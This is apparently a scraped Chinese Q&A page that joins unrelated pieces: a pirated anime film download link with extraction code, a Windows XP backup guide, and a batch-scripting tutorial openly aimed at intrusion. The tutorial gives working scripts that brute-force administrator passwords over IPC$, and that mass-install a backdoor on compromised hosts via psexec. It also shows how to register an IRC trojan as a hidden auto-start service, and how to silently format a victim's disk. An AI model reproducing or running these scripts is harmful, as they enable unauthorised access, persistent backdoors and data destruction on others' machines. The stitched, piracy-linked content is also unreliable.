wbx手錶怎麼樣

1. 《妖怪手錶：誕生的秘密喵》免費在線觀看完整版高清,求百度網盤資源

《妖怪手錶：誕生的秘密喵》網路網盤高清資源免費在線觀看:
鏈接: https://pan..com/s/1XmCy0tS3Ge_wBxFn1-bO8g

?pwd=6c9i 提取碼: 6c9i
《妖怪手錶：誕生的秘密喵》
導演: 日野晃博
編劇: 加藤陽一
主演: 戶松遙、小櫻悅子、關智一、梶裕貴、奈良徹、遠藤綾、佐藤智惠、志村健、片岡愛之助、島崎遙香
類型: 動畫
製片國家/地區: 日本
語言: 日語
上映日期: 2014-12-20(日本)
片長: 96分鍾
又名: 電影版妖怪手錶：誕生的秘密喵！(港)、Yo-kai Watch the Movie
某晚景太正睡覺時，手上的妖怪手錶突然發出刺眼光芒，接著消失不見了！翌日超巨大貓型妖怪「巨大喵」出現，聲稱世界即將落入魔爪之中並向景太救助。為了找尋線索，景太與威斯帕及地縛喵前往嫲嫲位於毛馬本村的家，遇上了神秘的「浮游喵」！他們跟著「浮游喵」一起進行時光旅行，回到了六十年前的世界進行大冒險。在那裡等待著他們的強大敵人究竟是誰？他們又能否順利找回妖怪手錶？

2. 怎樣進行資料備份（我是菜鳥）

重裝Windows XP之前必須進行的十大備份

即便是號稱目前最穩定的操作系統，WinXP也會由於各種天災人禍，如軟體損壞、病毒侵襲、黑客騷擾，甚或是我們自己的誤操作而造成崩潰的危險在時刻威脅著我們。系統崩潰或產生了重大錯誤以後，最好的辦法就是重裝系統，但是，在重裝之前，我們首先應該做哪些工作呢?大家一定會說:「備份!」然而，我們應該備份哪些東西呢?

一、備份硬碟數據

硬碟數據包括主引導扇區、操作系統引導扇區、FAT表、DIR表等，這是計算機系統賴以正常啟動的基礎，因此，及時備份好硬碟數據是首要的事情。對於硬碟數據的備份，最好的方法莫過於殺毒軟體了，推薦使用「瑞星」殺毒軟體，因為它不僅能夠備份以上的硬碟數據，而且可以讓用戶設定自動備份的時間。打開「瑞星」主界面後，點擊「設置」按鈕，選擇「選項」，再點擊「硬碟備份(B)」按鈕，即可設定備份硬碟數據的方式。以後，「瑞星」就會按照您設定的方式自動備份硬碟數據。

如果沒有「瑞星」，那麼也可以用KV3000來備份，在DOS命令提示符下鍵入KV3000/B命令後，系統將向軟盤輸出兩個無病毒的硬碟主引導信息文件，即HDPT.DAT和HFBOOT.DAT，這兩個文件就是硬碟的分區表及主引導記錄的信息。

注意:備份的硬碟數據只對當前硬碟分區狀態有效，如果以後又對硬碟重新進行分區或調整了分區的大小，那麼就應該重新備份。

二、備份注冊表

注冊表中存放著計算機的所有設置和各種軟硬體的注冊信息，所以它的重要性是不言自明的，因而及時備份注冊表是一項極其重要的工作。備份方法很簡單，只需在「運行」對話框中輸入「Regedit」並回車，然後在「注冊表編輯器」中選擇「注冊表」菜單下的「導出」命令就行了，當然別忘了將這個備份的注冊表文件存放在非系統分區中。或者直接將C:Windows目錄中的User.dat和System.dat兩個文件復制出來也能達到備份注冊表的目的。

三、備份驅動程序

重裝WinXP系統後，就需安裝各種硬體的驅動程序，而查找、安裝各類顯卡、音效卡的驅動實在是一大麻煩，如果丟失了驅動光碟，那更會讓我們急得如「熱鍋上的螞蟻」一般。此時，「驅動程序備份專家」就能幫助我們解決這個問題，它可以快速檢測計算機中的所有硬體設備，提取並備份硬體設備的驅動程序。它還附帶了一個INF腳本安裝器，可以簡化硬體設備的安裝過程，當我們需要重新安裝WinXP系統時，這些提取出來的驅動程序將派上大用場。

「驅動程序備份專家」的操作非常簡單，只需在其主界面中點擊「快速收集」按鈕，選擇某個硬體設備後點擊「備份」按鈕，再指定備份文件的存放路徑及文件名，點擊「開始」按鈕就行了。而如果想更快捷地備份全部的驅動，那麼就可以依次點擊「快速收集」、「備份全部」按鈕，這樣，系統中所有的驅動就將被全部「克隆」出來。需要提醒的是，在備份全部驅動的過程中，請不要按任何鍵或按鈕。

四、備份郵件帳號

許多上網的朋友都擁有多個郵件帳號，對於它們的備份工作，我們可以藉助於注冊表，在注冊表中依次展開到HKEY_CURRENT_USERSoftwareMicrosoftInternet Account ManagerAccounts分支，如果OE中有五個郵件帳號，那麼在Accounts鍵下就會有00000001～00000005五個子鍵(如圖3)。點擊「Accounts鍵，在菜單中選擇「注冊表-導出」命令，在「導出范圍」中選擇「選擇的分支」，輸入備份文件名，按「確定」按鈕即可將它們備份出來。
五、備份個人資料

勿庸置疑，個人資料是計算機用戶最重要的數據，它包括個人文件、下載資料、個人郵件、OICQ或ICQ數據等。

對於個人文件、下載資料的備份來說，我們只需將它們復制到硬碟的非系統分區或刻錄到光碟等地方就行了。

對於個人郵件的備份來說，如果使用的是Outlook Express，那麼，就應該將「C:Documents and SettingsUser nameLocal SettingsApplication DataIdentities{數字串}MicrosoftOutlook Express」目錄中的「收件箱.dbx」和「發件箱.dbx」兩個文件復制到非系統區。當然，最好是平時就將郵件位置自定義到其它地方，具體的步驟是:依次單擊「工具」-「選項」-「維護」-「存儲文件夾」，改為希望備份的郵件目錄即可。而對於備份Foxmail郵件來說則比較簡單，只需將Foxmail安裝目錄下的Mail子目錄中的文件復制到非系統區就行了。

OICQ與ICQ的備份:對於OICQ來說，聊天記錄和個人信息都存放在本地，最簡單的方法就是把OICQ的安裝文件夾中與自己OICQ號同名的子文件夾復制出來就行。當然，也可以利用OICQ提供的「導入」功能也能備份聊天記錄。ICQ卻與OICQ不同，ICQ並沒有將好友名單保存在伺服器中，而是保存在了客戶端，因此，在重裝系統後，不僅要重復鍵入自己的ICQ號和密碼，而且還要重新輸入好友們的ICQ號碼進行搜索並等待他們的確認，操作過程極為繁瑣。所以，我們應該利用第三方軟體來完成備份工作，在這里，向大家推薦使用ICQ Rescue這款專門備份ICQ的免費軟體，使用非常簡單，並且有詳細的提示，具體的操作就不多說了，下載地址: http://www.skycn.com/soft/744.html，大小隻有109KB。

六、備份地址簿

對於地址簿的備份，只需將C:Documents and Settings用戶名Application DataMicrosoftAddress Book中的文件復制到非系統區即可。當然，我們也可通過郵件軟體本身來備份，如OE地址簿，可通過「文件-導入-通訊簿」來備份;而對於Foxmail地址簿來說，則可通過它的「地址簿」窗口中的「工具」菜單下的「導出-Web文件」命令來備份。

七、備份郵件規則與個性化簽名

通過定製郵件規則可以有效地防止垃圾郵件，這些規則可以在離線狀態下設定，因此，郵件規則的備份也是一項很重要的工作。郵件規則的備份可以藉助於注冊表編輯器，找到HKEY_CURRNT_USERIdentities{77BEB813-E85F-411A-9704-CA8F14492CC2}SoftwareMicrosoftOutlook Express5.0RulesMail，該主鍵中保存著郵件規則設置，當然，用戶不同，那麼大括弧中的數據也會有所不同，將Mail主鍵導出，即可完成郵件規則的備份。

個性化簽名可以有兩種不同的實現方式，一是文本方式，即直接在OE中鍵入;二是文件方式，即指定某文件作為簽名，並附加在郵件的末尾。對於後者，備份自然非常簡單。而備份前者就需要在注冊表中進行操作。個性化簽名位於注冊表中上述5.0主鍵下的Signatures鍵值項中，導出Signatures也就備份了個性化簽名。

八、備份IE收藏夾

IE收藏夾中的BOOKMARKS存放在X:Documents and Settings用戶名Favorites目錄中的許多URL鏈接，把它們復制出來即可完成備份工作，而當重新安裝好系統後再將其復制到原來的目錄下即可完成恢復。除此以外，我們還可以利用IE的「導出」功能、改變收藏夾存放路徑來實現備份。

利用IE的「導出」功能:當您整理完收藏夾後，選擇IE「文件」菜單下的「導入和導出」命令，點擊「下一步」按鈕後，選擇「導出收藏夾」項，再次點擊「下一步」按鈕，然後按照提示輸入備份文件存放的路徑及文件名即可。

改變收藏夾存放路徑:在注冊表編輯器中展開到HKEY_CURRENT_ Folders分支，在右窗口中找到「Favorites」鍵值項，雙擊它後，在「數據數值」中輸入「E:favorites」即可。這樣，以後收藏夾中的內容都存放到了E區中(如果E區是非系統區)。

九、備份自定義片語

平時，我們為了更方便、快捷地輸入片語，經常會自己定義一些片語，但系統一旦崩潰，這些自定義的片語也就會隨之「犧牲」，那麼，我們就應該將它們備份出來，以供重裝系統後再用。在C:WindowsSystem32文件夾中，Wbx.emb、tmmr.rem、pXXXp.upt三個文件分別對應著五筆輸入、智能拼音、微軟拼音三種輸入法的自定義片語(其中的XXX是登錄系統時輸入的用戶名)，把它們復制出來就行了。另外，對於手工造詞，可以利用它的「功能菜單」中的「自造詞工具」自帶的「導出」命令將其保存到其他位置的保存也能達到備份的目的。如果您實在吃不準，那麼可以直接將C:WindowsSystem32文件夾下的輸入法文件都拷貝出來。

十、備份系統分區

備份系統分區，一個是用Ghost備份整個系統盤，另外一個方法是使用WinXP自帶的「系統還原」功能來備份。這些方法以及應注意的問題在論壇的帖子里都有所述及，這里就不贅述了。

有了以上各個方面的備份工作，相信廣大的計算機用戶對於「系統崩潰」就再也不會「膽顫心驚」了!為了系統的安全，也為了每個人的心血，請做好數據的備份工作，未雨綢繆，防患未然。

3. 誰能教我使用windows的命令行模式，還有dos批處理~

一:
windows的命令行模式
(win+R)在裡面寫CMD就可以進入windows的命令行模式了
二 :
批處理文件
批處理文件是無格式的文本文件，它包含一條或多條命令。它的文件擴展名為 .bat 或 .cmd。在命令提示下鍵入批處理文件的名稱，或者雙擊該批處理文件，系統就會調用Cmd.exe按照該文件中各個命令出現的順序來逐個運行它們。使用批處理文件（也被稱為批處理程序或腳本），可以簡化日常或重復性任務。當然我們的這個版本的主要內容是介紹批處理在入侵中一些實際運用，例如我們後面要提到的用批處理文件來給系統打補丁、批量植入後門程序等。下面就開始我們批處理學習之旅吧。 (本文因篇幅較長，所以分成兩部份。前半部份講命令，後半部分講實例分析。)
一、簡單批處理內部命令簡介
1.Echo 命令

打開回顯或關閉請求回顯功能，或顯示消息。如果沒有任何參數，echo 命令將顯示當前回顯設置。
語法
echo [{on off}] [message]
Sample：@echo off / echo hello world
在實際應用中我們會把這條命令和重定向符號（也稱為管道符號，一般用> >> ^）結合來實現輸入一些命令到特定格式的文件中.這將在以後的例子中體現出來。
2.@ 命令
表示不顯示@後面的命令，在入侵過程中（例如使用批處理來格式化敵人的硬碟）自然不能讓對方看到你使用的命令啦。
Sample：@echo off
@echo Now initializing the program,please wait a minite...
@format X: /q/u/autoset (format 這個命令是不可以使用/y這個參數的，可喜的是微軟留了個autoset這個參數給我們，效果和/y是一樣的。)
3.Goto 命令
指定跳轉到標簽，找到標簽後，程序將處理從下一行開始的命令。
語法：goto label （label是參數，指定所要轉向的批處理程序中的行。）
Sample：
if {%1}=={} goto noparms
if {%2}=={} goto noparms（如果這里的if、%1、%2你不明白的話，先跳過去，後面會有詳細的解釋。）
@Rem check parameters if null show usage
:noparms
echo Usage: monitor.bat ServerIP PortNumber
goto end
標簽的名字可以隨便起，但是最好是有意義的字母啦，字母前加個：用來表示這個字母是標簽，goto命令就是根據這個：來尋找下一步跳到到那裡。最好有一些說明這樣你別人看起來才會理解你的意圖啊。
4.Rem 命令
注釋命令，在C語言中相當與/*--------*/,它並不會被執行，只是起一個注釋的作用，便於別人閱讀和你自己日後修改。
Rem Message
Sample：@Rem Here is the description.
5.Pause 命令
運行 Pause 命令時，將顯示下面的消息：
Press any key to continue . . .
Sample：
@echo off
:begin
a:*.* d：\back
echo Please put a new disk into driver A
pause
goto begin
在這個例子中，驅動器 A 中磁碟上的所有文件均復制到d:\back中。顯示的注釋提示您將另一張磁碟放入驅動器 A 時，pause 命令會使程序掛起，以便您更換磁碟，然後按任意鍵繼續處理
6.Call 命令
從一個批處理程序調用另一個批處理程序，並且不終止父批處理程序。call 命令接受用作調用目標的標簽。如果在腳本或批處理文件外使用 Call，它將不會在命令行起作用。
語法 call [[Drive:][Path] FileName [BatchParameters]] [:label [arguments]]
參數
[Drive:}[Path] FileName
指定要調用的批處理程序的位置和名稱。filename 參數必須具有 .bat 或 .cmd 擴展名。
7.start 命令
調用外部程序，所有的DOS命令和命令行程序都可以由start命令來調用。
入侵常用參數：
MIN 開始時窗口最小化
SEPARATE 在分開的空間內開始 16 位 Windows 程序
HIGH 在 HIGH 優先順序類別開始應用程序
REALTIME 在 REALTIME 優先順序類別開始應用程序
WAIT 啟動應用程序並等候它結束
parameters 這些為傳送到命令/程序的參數
執行的應用程序是 32-位 GUI 應用程序時，CMD.EXE 不等應用程序終止就返回命令提示。如果在命令腳本內執行，該新行為則不會發生。
8.choice 命令
choice 使用此命令可以讓用戶輸入一個字元，從而運行不同的命令。使用時應該加/c:參數，c:後應寫提示可輸入的字元，之間無空格。它的返回碼為1234……
如: choice /c:dme defrag,mem,end
將顯示
defrag,mem,end[D,M,E]?
Sample：
Sample.bat的內容如下:
@echo off
choice /c:dme defrag,mem,end
if errorlevel 3 goto defrag （應先判斷數值最高的錯誤碼）
if errorlevel 2 goto mem
if errotlevel 1 goto end
:defrag
c:\dos\defrag
goto end
:mem
mem
goto end
:end
echo good bye
此文件運行後，將顯示 defrag,mem,end[D,M,E]? 用戶可選擇d m e ，然後if語句將作出判斷，d表示執行標號為defrag的程序段，m表示執行標號為mem的程序段，e表示執行標號為end的程序段，每個程序段最後都以goto end將程序跳到end標號處，然後程序將顯示good bye，文件結束。
9.If 命令
if 表示將判斷是否符合規定的條件，從而決定執行不同的命令。 有三種格式:
1、if "參數" == "字元串" 待執行的命令
參數如果等於指定的字元串，則條件成立，運行命令，否則運行下一句。(注意是兩個等號）
如if "%1"=="a" format a:
if {%1}=={} goto noparms
if {%2}=={} goto noparms
2、if exist 文件名 待執行的命令
如果有指定的文件，則條件成立，運行命令，否則運行下一句。
如if exist config.sys edit config.sys
3、if errorlevel / if not errorlevel 數字 待執行的命令
如果返回碼等於指定的數字，則條件成立，運行命令，否則運行下一句。
如if errorlevel 2 goto x2
DOS程序運行時都會返回一個數字給DOS，稱為錯誤碼errorlevel或稱返回碼，常見的返回碼為0、1。
10.for 命令
for 命令是一個比較復雜的命令，主要用於參數在指定的范圍內循環執行命令。
在批處理文件中使用 FOR 命令時，指定變數請使用 %%variable
for {%variable %%variable} in (set) do command [ CommandLineOptions]
%variable 指定一個單一字母可替換的參數。
(set) 指定一個或一組文件。可以使用通配符。
command 指定對每個文件執行的命令。
command-parameters 為特定命令指定參數或命令行開關。
在批處理文件中使用 FOR 命令時，指定變數請使用 %%variable
而不要用 %variable。變數名稱是區分大小寫的，所以 %i 不同於 %I
如果命令擴展名被啟用，下列額外的 FOR 命令格式會受到
支持:
FOR /D %variable IN (set) DO command [command-parameters]
如果集中包含通配符，則指定與目錄名匹配，而不與文件名匹配。
FOR /R [[drive:]path] %variable IN (set) DO command [command-
檢查以 [drive:]path 為根的目錄樹，指向每個目錄中的FOR 語句。如果在 /R 後沒有指定目錄，則使用當前目錄。如果集僅為一個單點(.)字元，則枚舉該目錄樹。
FOR /L %variable IN (start,step,end) DO command [command-para
該集表示以增量形式從開始到結束的一個數字序列。
因此，(1,1,5) 將產生序列 1 2 3 4 5，(5,-1,1) 將產生
序列 (5 4 3 2 1)。
FOR /F ["options"] %variable IN (file-set) DO command
FOR /F ["options"] %variable IN ("string") DO command
FOR /F ["options"] %variable IN (command) DO command
或者，如果有 usebackq 選項
FOR /F ["options"] %variable IN (file-set) DO command
FOR /F ["options"] %variable IN ("string") DO command
FOR /F ["options"] %variable IN (command) DO command
filenameset 為一個或多個文件名。繼續到 filenameset 中的
下一個文件之前，每份文件都已被打開、讀取並經過處理。
處理包括讀取文件，將其分成一行行的文字，然後將每行
解析成零或更多的符號。然後用已找到的符號字元串變數值
調用 For 循環。以默認方式，/F 通過每個文件的每一行中分開
的第一個空白符號。跳過空白行。您可通過指定可選 "options"
參數替代默認解析操作。這個帶引號的字元串包括一個或多個
指定不同解析選項的關鍵字。這些關鍵字為:
eol=c - 指一個行注釋字元的結尾(就一個)
skip=n - 指在文件開始時忽略的行數
delims=xxx - 指分隔符集。這個替換了空格和跳格鍵的
默認分隔符集。
tokens=x,y,m-n - 指每行的哪一個符號被傳遞到每個迭代
的 for 本身。這會導致額外變數名稱的
格式為一個范圍。通過 nth 符號指定 m
符號字元串中的最後一個字元星號，
那麼額外的變數將在最後一個符號解析之
分配並接受行的保留文本。
usebackq - 指定新語法已在下類情況中使用:
在作為命令執行一個後引號的字元串並且引號字元為文字字元串命令並允許在 fi中使用雙引號擴起文件名稱。
sample1:
FOR /F "eol=; tokens=2,3* delims=, " %i in (myfile.txt) do command
會分析 myfile.txt 中的每一行，忽略以分號打頭的那些行，將每行中的第二個和第三個符號傳遞給 for 程序體；用逗號和/或空格定界符號。請注意，這個 for 程序體的語句引用 %i 來取得第二個符號，引用 %j 來取得第三個符號，引用 %k來取得第三個符號後的所有剩餘符號。對於帶有空格的文件名，您需要用雙引號將文件名括起來。為了用這種方式來使用雙引號，您還需要使用 usebackq 選項，否則，雙引號會被理解成是用作定義某個要分析的字元串的。
%i 專門在 for 語句中得到說明，%j 和 %k 是通過
tokens= 選項專門得到說明的。您可以通過 tokens= 一行指定最多 26 個符號，只要不試圖說明一個高於字母 z 或Z 的變數。請記住，FOR 變數是單一字母、分大小寫和全局的同時不能有 52 個以上都在使用中。
您還可以在相鄰字元串上使用 FOR /F 分析邏輯；方法是，用單引號將括弧之間的 filenameset 括起來。這樣，該字元串會被當作一個文件中的一個單一輸入行。
最後，您可以用 FOR /F 命令來分析命令的輸出。方法是，將括弧之間的 filenameset 變成一個反括字元串。該字元串會被當作命令行，傳遞到一個子 CMD.EXE，其輸出會被抓進內存，並被當作文件分析。因此，以下例子:
FOR /F "usebackq delims==" %i IN (`set`) DO @echo %i
會枚舉當前環境中的環境變數名稱。
另外，FOR 變數參照的替換已被增強。您現在可以使用下列
選項語法:
~I - 刪除任何引號(")，擴充 %I
%~fI - 將 %I 擴充到一個完全合格的路徑名
%~dI - 僅將 %I 擴充到一個驅動器號
%~pI - 僅將 %I 擴充到一個路徑
%~nI - 僅將 %I 擴充到一個文件名
%~xI - 僅將 %I 擴充到一個文件擴展名
%~sI - 擴充的路徑只含有短名
%~aI - 將 %I 擴充到文件的文件屬性
%~tI - 將 %I 擴充到文件的日期/時間
%~zI - 將 %I 擴充到文件的大小
%~$PATH:I - 查找列在路徑環境變數的目錄，並將 %I 擴充到找到的第一個完全合格的名稱。如果環境變數未被定義，或者沒有找到文件，此組合鍵會擴充空字元串
可以組合修飾符來得到多重結果:
%~dpI - 僅將 %I 擴充到一個驅動器號和路徑
%~nxI - 僅將 %I 擴充到一個文件名和擴展名
%~fsI - 僅將 %I 擴充到一個帶有短名的完整路徑名
%~dp$PATH:i - 查找列在路徑環境變數的目錄，並將 %I 擴充到找到的第一個驅動器號和路徑。
%~ftzaI - 將 %I 擴充到類似輸出線路的 DIR
在以上例子中，%I 和 PATH 可用其他有效數值代替。%~ 語法
用一個有效的 FOR 變數名終止。選取類似 %I 的大寫變數名比較易讀，而且避免與不分大小寫的組合鍵混淆。
以上是MS的官方幫助，下面我們舉幾個例子來具體說明一下For命令在入侵中的用途。
sample2：
利用For命令來實現對一台目標Win2k主機的暴力密碼破解。
我們用net use \\ip\ipc$ "password" /u:"administrator"來嘗試這和目標主機進行連接，當成功時記下密碼。
最主要的命令是一條：for /f i% in (dict.txt) do net use \\ip\ipc$ "i%" /u:"administrator"
用i%來表示admin的密碼，在dict.txt中這個取i%的值用net use 命令來連接。然後將程序運行結果傳遞給find命令－－
for /f i%% in (dict.txt) do net use \\ip\ipc$ "i%%" /u:"administrator" find ":命令成功完成">>D:\ok.txt ，這樣就ko了。
sample3：
你有沒有過手裡有大量肉雞等著你去種後門＋木馬呢？，當數量特別多的時候，原本很開心的一件事都會變得很郁悶：）。文章開頭就談到使用批處理文件，可以簡化日常或重復性任務。那麼如何實現呢？呵呵，看下去你就會明白了。
主要命令也只有一條：（在批處理文件中使用 FOR 命令時，指定變數使用 %%variable）
@for /f "tokens=1,2,3 delims= " %%i in (victim.txt) do start call door.bat %%i %%j %%k
tokens的用法請參見上面的sample1，在這里它表示按順序將victim.txt中的內容傳遞給door.bat中的參數%i %j %k。
而cultivate.bat無非就是用net use命令來建立IPC$連接，並木馬＋後門到victim，然後用返回碼（If errorlever =）來篩選成功種植後門的主機，並echo出來，或者echo到指定的文件。
delims= 表示vivtim.txt中的內容是一空格來分隔的。我想看到這里你也一定明白這victim.txt里的內容是什麼樣的了。應該根據%%i %%j %%k表示的對象來排列，一般就是 ip password username。
代碼雛形：
--------------- cut here then save as a batchfile(I call it main.bat ) ---------------------------
@echo off
@if "%1"=="" goto usage
@for /f "tokens=1,2,3 delims= " %%i in (victim.txt) do start call IPChack.bat %%i %%j %%k
@goto end
:usage
@echo run this batch in dos modle.or just double-click it.
:end
--------------- cut here then save as a batchfile(I call it main.bat ) ---------------------------
------------------- cut here then save as a batchfile(I call it door.bat) -----------------------------
@net use \\%1\ipc$ %3 /u:"%2"
@if errorlevel 1 goto failed
@echo Trying to establish the IPC$ connection …………OK
@ windrv32.exe\\%1\admin$\system32 && if not errorlevel 1 echo IP %1 USER %2 PWD %3 >>ko.txt
@psexec \\%1 c:\winnt\system32\windrv32.exe
@psexec \\%1 net start windrv32 && if not errorlevel 1 echo %1 Backdoored >>ko.txt
:failed
@echo Sorry can not connected to the victim.
----------------- cut here then save as a batchfile(I call it door.bat) --------------------------------
這只是一個自動種植後門批處理的雛形，兩個批處理和後門程序（Windrv32.exe）,PSexec.exe需放在統一目錄下.批處理內容
尚可擴展,例如:加入清除日誌+DDOS的功能,加入定時添加用戶的功能,更深入一點可以使之具備自動傳播功能(蠕蟲).此處不多做敘述,有興趣的朋友可自行研究.
二、如何在批處理文件中使用參數
批處理中可以使用參數，一般從1%到 9%這九個，當有多個參數時需要用shift來移動，這種情況並不多見，我們就不考慮它了。
sample1：fomat.bat
@echo off
if "%1"=="a" format a:
:format
@format a:/q/u/auotset
@echo please insert another disk to driver A.
@pause
@goto fomat
這個例子用於連續地格式化幾張軟盤，所以用的時候需在dos窗口輸入fomat.bat a，呵呵,好像有點畫蛇添足了～^_^
sample2：
當我們要建立一個IPC$連接地時候總要輸入一大串命令，弄不好就打錯了，所以我們不如把一些固定命令寫入一個批處理，把肉雞地ip password username 當著參數來賦給這個批處理，這樣就不用每次都打命令了。
@echo off
@net use \\1%\ipc$ "2%" /u:"3%" 注意哦，這里PASSWORD是第二個參數。
@if errorlevel 1 echo connection failed
怎麼樣,使用參數還是比較簡單的吧？你這么帥一定學會了^_^.No.3
三、如何使用組合命令(Compound Command)
1.&
Usage：第一條命令 & 第二條命令 [& 第三條命令...]
用這種方法可以同時執行多條命令，而不管命令是否執行成功
Sample：
C:\>dir z: & dir c:\Ex4rch
The system cannot find the path specified.
Volume in drive C has no label.
Volume Serial Number is 0078-59FB
Directory of c:\Ex4rch
2002-05-14 23:51
2002-05-14 23:51 ..
2002-05-14 23:51 14 sometips.gif
3.
Usage：第一條命令 第二條命令 [ 第三條命令...]
用這種方法可以同時執行多條命令，當碰到執行正確的命令後將不執行後面的命令，如果沒有出現正確的命令則一直執行完所有命令；
Sample：
C:\Ex4rch>dir sometips.gif del sometips.gif
Volume in drive C has no label.
Volume Serial Number is 0078-59FB
Directory of C:\Ex4rch
2002-05-14 23:55 14 sometips.gif
1 File(s) 14 bytes
0 Dir(s) 768,696,320 bytes free
組合命令使用的例子：
sample：
@ trojan.exe \\%1\admin$\system32 && if not errorlevel 1 echo IP %1 USER %2 PASS %3 >>victim.txt
四、管道命令的使用
1. 命令
Usage：第一條命令 第二條命令 [ 第三條命令...]
將第一條命令的結果作為第二條命令的參數來使用，記得在unix中這種方式很常見。
sample：
time /t>>D:\IP.log
netstat -n -p tcp find ":3389">>D:\IP.log
start Explorer
看出來了么？用於終端服務允許我們為用戶自定義起始的程序，來實現讓用戶運行下面這個bat，以獲得登錄用戶的IP。
2.>、>>輸出重定向命令
將一條命令或某個程序輸出結果的重定向到特定文件中, > 與 >>的區別在於，>會清除調原有文件中的內容後寫入指定文件，而>>只會追加內容到指定文件中，而不會改動其中的內容。
sample1：
echo hello world>c:\hello.txt (stupid example?)
sample2:
時下DLL木馬盛行，我們知道system32是個捉迷藏的好地方，許多木馬都削尖了腦袋往那裡鑽，DLL馬也不例外，針對這一點我們可以在安裝好系統和必要的應用程序後，對該目錄下的EXE和DLL文件作一個記錄：
運行CMD--轉換目錄到system32--dir *.exe>exeback.txt & dir *.dll>dllback.txt,
這樣所有的EXE和DLL文件的名稱都被分別記錄到exeback.txt和dllback.txt中,
日後如發現異常但用傳統的方法查不出問題時,則要考慮是不是系統中已經潛入DLL木馬了.
這時我們用同樣的命令將system32下的EXE和DLL文件記錄到另外的exeback1.txt和dllback1.txt中,然後運行:
CMD--fc exeback.txt exeback1.txt>diff.txt & fc dllback.txt dllback1.txt>diff.txt.(用FC命令比較前後兩次的DLL和EXE文件,並將結果輸入到diff.txt中),這樣我們就能發現一些多出來的DLL和EXE文件,然後通過查看創建時間、版本、是否經過壓縮等就能夠比較容易地判斷出是不是已經被DLL木馬光顧了。沒有是最好，如果有的話也不要直接DEL掉，先用regsvr32 /u trojan.dll將後門DLL文件注銷掉,再把它移到回收站里，若系統沒有異常反映再將之徹底刪除或者提交給殺毒軟體公司。
3.< 、>& 、<&
< 從文件中而不是從鍵盤中讀入命令輸入。
>& 將一個句柄的輸出寫入到另一個句柄的輸入中。
<& 從一個句柄讀取輸入並將其寫入到另一個句柄輸出中。
這些並不常用，也就不多做介紹。
No.5
五、如何用批處理文件來操作注冊表
在入侵過程中經常回操作注冊表的特定的鍵值來實現一定的目的，例如:為了達到隱藏後門、木馬程序而刪除Run下殘余的鍵值。或者創建一個服務用以載入後門。當然我們也會修改注冊表來加固系統或者改變系統的某個屬性，這些都需要我們對注冊表操作有一定的了解。下面我們就先學習一下如何使用.REG文件來操作注冊表.(我們可以用批處理來生成一個REG文件)
關於注冊表的操作，常見的是創建、修改、刪除。
1.創建
創建分為兩種，一種是創建子項(Subkey)
我們創建一個文件，內容如下：
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\hacker]
然後執行該腳本，你就已經在HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft下創建了一個名字為「hacker」的子項。
另一種是創建一個項目名稱
那這種文件格式就是典型的文件格式，和你從注冊表中導出的文件格式一致，內容如下：
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]"
Invader"="Ex4rch"
"Door"=C:\\WINNT\\system32\\door.exe
"Autodos"=dword:02
這樣就在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]下
新建了:Invader、door、about這三個項目
Invader的類型是「String Value」
door的類型是「REG SZ Value」
Autodos的類型是「DWORD Value」
2.修改
修改相對來說比較簡單，只要把你需要修改的項目導出，然後用記事本進行修改，然後導入（regedit /s）即可。
3.刪除
我們首先來說說刪除一個項目名稱，我們創建一個如下的文件：
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Ex4rch"=-
執行該腳本，[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]下的"Ex4rch"就被刪除了；
我們再看看刪除一個子項，我們創建一個如下的腳本：
Windows Registry Editor Version 5.00
[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
執行該腳本，[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]就已經被刪除了。
相信看到這里，.reg文件你基本已經掌握了。那麼現在的目標就是用批處理來創建特定內容的.reg文件了，記得我們前面說道的利用重定向符號可以很容易地創建特定類型的文件。
samlpe1:如上面的那個例子,如想生成如下注冊表文件
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Invader"="Ex4rch"
"door"=hex:255
"Autodos"=dword:000000128
只需要這樣：
@echo Windows Registry Editor Version 5.00>>Sample.reg
@echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]>Sample.reg
@echo "Invader"="Ex4rch">>Sample.reg
@echo "door"=5>>C:\\WINNT\\system32\\door.exe>>Sample.reg
@echo "Autodos"=dword:02>>Sample.reg
samlpe2:
我們現在在使用一些比較老的木馬時,可能會在注冊表的[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run(Runonce、Runservices、Runexec)]下生成一個鍵值用來實現木馬的自啟動.但是這樣很容易暴露木馬程序的路徑,從而導致木馬被查殺,相對地若是將木馬程序注冊為系統服務則相對安全一些.下面以配置好地IRC木馬DSNX為例(名為windrv32.exe)
@start windrv32.exe
@attrib +h +r windrv32.exe
@echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] >>patch.dll
@echo "windsnx "=- >>patch.dll
@sc.exe create Windriversrv type= kernel start= auto displayname= WindowsDriver binpath= c:\winnt\system32\windrv32.exe
@regedit /s patch.dll
@delete patch.dll
@REM [刪除DSNXDE在注冊表中的啟動項，用sc.exe將之注冊為系統關鍵性服務的同時將其屬性設為隱藏和只讀，並config為自啟動]
@REM 這樣不是更安全^_^.